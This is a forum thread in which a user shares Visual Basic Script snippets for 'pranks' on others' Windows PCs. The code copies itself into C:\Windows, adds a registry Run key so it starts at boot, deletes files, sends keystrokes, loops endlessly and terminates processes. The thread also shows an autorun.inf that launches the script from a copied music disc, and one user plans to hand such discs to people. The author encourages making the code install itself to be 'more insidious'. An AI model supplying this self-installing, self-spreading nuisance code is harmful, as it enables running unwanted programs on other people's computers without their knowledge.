Follow along with the video below to see how to install our site as a web app on your home screen.
Note: this_feature_currently_requires_accessing_site_using_safari
jabberwock95 said:'wankergayinsultiassg crapwords' = 'instulting words'
I find it fun when they actually make readable words. I think 'underwankerstandable' is my word for today. :ELittleB said:Oh the irony that all those words appeared rigt in that phrase
What i've been using is actually visual basic script (vbs). Visual Basic is a programming language that has to be written and compiled with Microsoft VB Editor or something similar, VBS is a kind of dumbed down version that is just commands in a .vbs file.ray_MAN said:Jabberwock, are there any tutorials for this kind of stuff? I looked for VB tutorials, but I got some weird ones.
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile "C:\Originalfile.vbs", "C:\Windows\NewFile.vbs"
fso.CopyFile WScript.ScriptFullName, "C:\Windows\NewFile.vbs"
fso.deletefile ("C:\FileToDelete.vbs")
Set.oText = fso.CreateTextFile("C:\NewTextFile.vbs", TRUE)
oText.WriteLine "This text goes in the created file."
Set WshShell = Wscript.CreateObject("Wscript.Shell")
WshShell.RegWrite "HKLM\software\microsoft\windows\currentversion\run\whatever", "C:\Windows\YourFile.vbs"
WshShell.RegDelete "HKLM\software\microsoft\windows\currentversion\run\whatever"
wscript.sleep 1000
wshshell.sendkeys "hi there"
Do
Dim number
For number = 1 to 50
*PUT YOUR CODE HERE*
Next
do
*CODE HERE*
loop
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
strQuery = "Select * from Win32_Process where Name=PROCESSHERE.exe"
Set colItems = objWMIService.ExecQuery(strQuery,,48)
For Each objItem in colItems
objItem.Terminate
Next
Lol, sig'd'underwankerstandable'
1. Open NotepadEvo said:Any way to put these pranks on a disc, i.e copied music disc that when played starts the program?
[autorun]
open=TheFileName.vbs
Remember, all of the stuff I have written is easily modified to 'install' itself to make it more insidious and annoying. I encorage anyone to make thier own programs, but I will gladly help anyone looking for something specific.Evo said:Cool and cheers mate, will try this lot out when someone asks for a copy sometime!